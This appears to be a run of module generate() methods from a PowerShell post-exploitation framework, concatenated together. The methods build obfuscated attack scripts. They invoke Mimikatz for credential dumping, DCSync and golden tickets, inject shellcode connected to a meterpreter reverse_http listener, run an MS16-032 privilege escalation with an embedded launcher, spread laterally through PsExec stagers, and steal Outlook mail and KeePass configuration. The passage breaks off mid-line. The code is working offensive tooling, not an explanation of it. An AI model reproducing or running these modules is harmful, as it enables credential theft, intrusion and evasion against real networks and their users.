def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nExploit-Jenkins" scriptEnd += " -Rhost "+str(self.options['Rhost']['Value']) scriptEnd += " -Port "+str(self.options['Port']['Value']) command = str(self.options['Cmd']['Value']) # if the command contains spaces, wrap it in quotes before passing to ps script if " " in command: scriptEnd += " -Cmd \"" + command + "\"" else: scriptEnd += " -Cmd " + command if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # build the dump command with whatever options we want scriptEnd = "Invoke-Mimikatz -DumpCreds;" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] instance = self.options['Instance']['Value'] query = self.options['Query']['Value'] # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLQuery.ps1" script = "" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" scriptEnd = " Get-SQLQuery" if username != "": scriptEnd += " -Username "+username if password != "": scriptEnd += " -Password "+password if instance != "": scriptEnd += " -Instance "+instance scriptEnd += " -Query "+"\'"+query+"\'" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SPN.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nGet-SPN" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += " -List yes | Format-Table -Wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # the PowerShell script itself, with the command to invoke # for execution appended to the end. Scripts should output # everything to the pipeline for proper parsing. # # the script should be stripped of comments, with a link to any # original reference script included in the comments. moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Find-TrustedDocuments.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Find-TrustedDocuments" if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "" if self.options['Method']['Value'].lower() == "sekurlsa": scriptEnd += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'" else: scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-ShellcodeMSIL" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if option.lower() == "shellcode": # transform the shellcode to the correct format sc = ",0".join(values['Value'].split("\\"))[1:] scriptEnd += " -" + str(option) + " @(" + sc + ")" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-DllInjection.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nInvoke-DllInjection" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerup.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/trollsploit/Get-RickAstley.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" script = f.read() f.close() scriptEnd = moduleName + " " scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/recon/HTTP-Login.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nTest-Login" for option,values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "showall": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += " | Out-String" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # build the custom command with whatever options we want scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'" if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode + "\n" scriptEnd = moduleName + " " for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"lsadump::dcsync /user:"******"domain"]['Value'] != "": scriptEnd += " /domain:" + self.options['domain']['Value'] if self.options["dc"]['Value'] != "": scriptEnd += " /dc:" + self.options['dc']['Value'] scriptEnd += "\"';" if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() # get just the code needed for the specified function script = moduleCode scriptEnd = "\nFind-KeePassconfig | Get-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-WinEnum " # add any arguments to the end execution of the script for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # ridiculous escape format groups = " ".join(['"\\""'+group.strip().strip("'\"")+'"""' for group in self.options["Groups"]['Value'].split(",")]) # build the custom command with whatever options we want command = '""misc::addsid '+self.options["User"]['Value'] + ' ' + groups # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/exfil/Invoke-EgressCheck.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # Need to actually run the module that has been loaded scriptEnd = 'Invoke-EgressCheck' # add any arguments to the end execution of the script for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] folderName = self.options['FolderName']['Value'] maxEmails = self.options['MaxEmails']['Value'] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode + "\n" scriptEnd = "Get-OutlookFolder -Name '%s' | Get-EmailItems -MaxEmails %s" %(folderName, maxEmails) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-Portscan.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-PortScan -noProgressMeter -f" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # build the custom command with whatever options we want command = "misc::memssp" # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nInvoke-Shellcode -Force" listenerName = self.options['Listener']['Value'] if listenerName != "": if not self.mainMenu.listeners.is_listener_valid(listenerName): print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # TODO: redo pulling these listener configs... #Old method no longer working #temporary fix until a more elegant solution is in place, unless this is the most elegant???? :) #[ID,name,host,port,cert_path,staging_key,default_delay,default_jitter,default_profile,kill_date,working_hours,listener_type,redirect_target,default_lost_limit] = self.mainMenu.listeners.get_listener(listenerName) host = self.mainMenu.listeners.loadedListeners['meterpreter'].options['Host']['Value'] port = self.mainMenu.listeners.loadedListeners['meterpreter'].options['Port']['Value'] MSFpayload = "reverse_http" if "https" in host: MSFpayload += "s" hostname = host.split(":")[1].strip("/") self.options['Lhost']['Value'] = str(hostname) self.options['Lport']['Value'] = str(port) self.options['Payload']['Value'] = str(MSFpayload) for option,values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "listener": if values['Value'] and values['Value'] != '': if option.lower() == "payload": payload = "windows/meterpreter/" + str(values['Value']) scriptEnd += " -" + str(option) + " " + payload elif option.lower() == "shellcode": # transform the shellcode to the correct format sc = ",0".join(values['Value'].split("\\"))[1:] scriptEnd += " -" + str(option) + " @(" + sc + ")" else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += "; 'Shellcode injected.'" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # generate the launcher code without base64 encoding l = self.mainMenu.stagers.stagers['multi/launcher'] l.options['Listener']['Value'] = self.options['Listener']['Value'] l.options['UserAgent']['Value'] = self.options['UserAgent']['Value'] l.options['Proxy']['Value'] = self.options['Proxy']['Value'] l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value'] l.options['Base64']['Value'] = 'False' launcherCode = l.generate() # need to escape characters launcherCode = launcherCode.replace("`", "``").replace("$", "`$").replace("\"","'") scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"' scriptEnd += ';`nInvoke-MS16032 completed.' if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-ReverseDNSLookup.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-ReverseDNSLookup" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) # only return objects where HostName is not an IP (i.e. the address resolves) scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-NinjaCopy.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "$null = Invoke-NinjaCopy " for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): listenerName = self.options['Listener']['Value'] computerName = self.options['ComputerName']['Value'] serviceName = self.options['ServiceName']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] command = self.options['Command']['Value'] resultFile = self.options['ResultFile']['Value'] # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-PsExec.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "" if command != "": # executing a custom command on the remote machine return "" # if else: if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) if launcher == "": print helpers.color("[!] Error in launcher generation.") return "" else: stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher scriptEnd += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, stagerCmd) scriptEnd += "| Out-String | %{$_ + \"`n\"};" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common powerup.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-RunAs.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" script = f.read() f.close() scriptEnd = "\nInvoke-RunAs " # if a credential ID is specified, try to parse credID = self.options["CredID"]['Value'] if credID != "": if not self.mainMenu.credentials.is_credential_valid(credID): print helpers.color("[!] CredID is invalid!") return "" (credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0] if credType != "plaintext": print helpers.color("[!] A CredID with a plaintext password must be used!") return "" if domainName != "": self.options["Domain"]['Value'] = domainName if userName != "": self.options["UserName"]['Value'] = userName if password != "": self.options["Password"]['Value'] = password if self.options["Domain"]['Value'] == "" or self.options["UserName"]['Value'] == "" or self.options["Password"]['Value'] == "": print helpers.color("[!] Domain/UserName/Password or CredID required!") return "" for option,values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "credid": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # if a credential ID is specified, try to parse credID = self.options["CredID"]['Value'] if credID != "": if not self.mainMenu.credentials.is_credential_valid(credID): print helpers.color("[!] CredID is invalid!") return "" (credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0] if userName != "krbtgt": print helpers.color("[!] A krbtgt account must be used") return "" if domainName != "": self.options["domain"]['Value'] = domainName if sid != "": self.options["sid"]['Value'] = sid if password != "": self.options["krbtgt"]['Value'] = password if self.options["krbtgt"]['Value'] == "": print helpers.color("[!] krbtgt hash not specified") # build the golden ticket command scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::golden" for option,values in self.options.iteritems(): if option.lower() != "agent" and option.lower() != "credid": if values['Value'] and values['Value'] != '': scriptEnd += " /" + str(option) + ":" + str(values['Value']) scriptEnd += " /ptt\"'" if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): listenerName = self.options['Listener']['Value'] procID = self.options['ProcId']['Value'].strip() userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] arch = self.options['Arch']['Value'] moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() # If you'd just like to import a subset of the functions from the # module source, use the following: # script = helpers.generate_dynamic_powershell_script(moduleCode, ["Get-Something", "Set-Something"]) script = moduleCode scriptEnd = "; shellcode injected into pid {}".format(str(procID)) if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print helpers.color("[!] Invalid listener: {}".format(listenerName)) return '' else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) if launcher == '': print helpers.color('[!] Error in launcher generation.') return '' else: launcherCode = launcher.split(' ')[-1] sc = self.mainMenu.stagers.generate_shellcode(launcherCode, arch) encoded_sc = helpers.encode_base64(sc) # Add any arguments to the end execution of the script #t = iter(sc) #pow_array = ',0x'.join(a+b for a,b in zip(t, t)) #pow_array = "@(0x" + pow_array + " )" script += "\nInvoke-Shellcode -ProcessID {} -Shellcode $([Convert]::FromBase64String(\"{}\")) -Force".format(procID, encoded_sc) script += 